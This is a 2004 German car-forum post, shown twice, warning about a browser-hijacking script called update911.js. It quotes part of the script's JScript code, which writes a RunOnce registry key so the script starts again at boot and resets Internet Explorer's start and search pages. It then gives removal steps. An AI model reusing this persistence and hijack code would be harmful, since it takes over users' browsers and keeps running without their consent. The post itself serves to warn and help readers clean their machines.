BMW 7er-Forum - Einzelnen Beitrag anzeigen

knuffel · 07.01.2004, 23:07

Hi.

update911.js (der Monat/Tag/Jahr) September/11 ..Twin-Tower-Desaster.
(Porsche freut sich)

Bremst die Online-Verbindungen mächtig aus und
baut eine Verbindung zu bestimmten Rechnern auf,deren
Link ich hier rausgenommen habe....Vorsichtshalber

var fso = new ActiveXObject("Scripting.FileSystemObject&quo t

;
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell&quot

;
Shell.RegWrite("HKLM\\Software\\Microsoft\\Wi ndows\\CurrentVersion\\RunOnce\\tlc",filepath );
Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Use Search Asst","no&quot

;
Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD&quot

;

Bitte prüfen,ob auf dem PC die folgende Datei vorhanden ist:
" C:\WINDOWS\FONTS\msoffice.hta "
... wenn ja, steht vermutlich auch der folgend Schlüssel in der registry:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\]
"Msoffice"="C:\\WINDOWS\\FONTS\\mso ffice.hta"

Der Aufruf muß, die Datei sollte entfernt werden.
Vorsichtshalber auch die Run-Schlüssel unter HKCU prüfen.)

Der Fehler entsteht durch ein Skript,das durch die Firewall und Spybot etc.
eine .dll rüberlädt und immer beim Start loslaufen läßt.
Aber so gut getarnt, dass wenige Programme die finden!
(auch Spybot S&D nicht)
Ein Programm geht und zwar "Security Task Manager"
Dieses macht alle aktiven Prozesse sichtbar und man weiß,was sich
im Hintergrund auf dem Rechner tut.

Zum Download HIER

Gruß
Knuffel

07.01.2004, 23:07	#8
knuffel † 2023 Registriert seit: 20.10.2002 Ort: Fahrzeug: E32, Velociped NL	Spy-Bot /Adaware/ finden auch nicht alles...Z.B. der hier Hi. update911.js (der Monat/Tag/Jahr) September/11 ..Twin-Tower-Desaster. (Porsche freut sich) Bremst die Online-Verbindungen mächtig aus und baut eine Verbindung zu bestimmten Rechnern auf,deren Link ich hier rausgenommen habe....Vorsichtshalber var fso = new ActiveXObject("Scripting.FileSystemObject&quo t; var tfolder = fso.GetSpecialFolder(0); var filepath = tfolder + "\\update911.js"; var Shell = new ActiveXObject("WScript.Shell" Shell.RegWrite("HKLM\\Software\\Microsoft\\Wi ndows\\CurrentVersion\\RunOnce\\tlc",filepath ); Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Start Page",url); Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Search Page",url); Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Search Bar",burl); Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Use Search Asst","no" Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD" Bitte prüfen,ob auf dem PC die folgende Datei vorhanden ist: " C:\WINDOWS\FONTS\msoffice.hta " ... wenn ja, steht vermutlich auch der folgend Schlüssel in der registry: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\] "Msoffice"="C:\\WINDOWS\\FONTS\\mso ffice.hta" Der Aufruf muß, die Datei sollte entfernt werden. Vorsichtshalber auch die Run-Schlüssel unter HKCU prüfen.) Der Fehler entsteht durch ein Skript,das durch die Firewall und Spybot etc. eine .dll rüberlädt und immer beim Start loslaufen läßt. Aber so gut getarnt, dass wenige Programme die finden! (auch Spybot S&D nicht) Ein Programm geht und zwar "Security Task Manager" Dieses macht alle aktiven Prozesse sichtbar und man weiß,was sich im Hintergrund auf dem Rechner tut. Zum Download HIER Gruß Knuffel __________________ Gruß Knuffel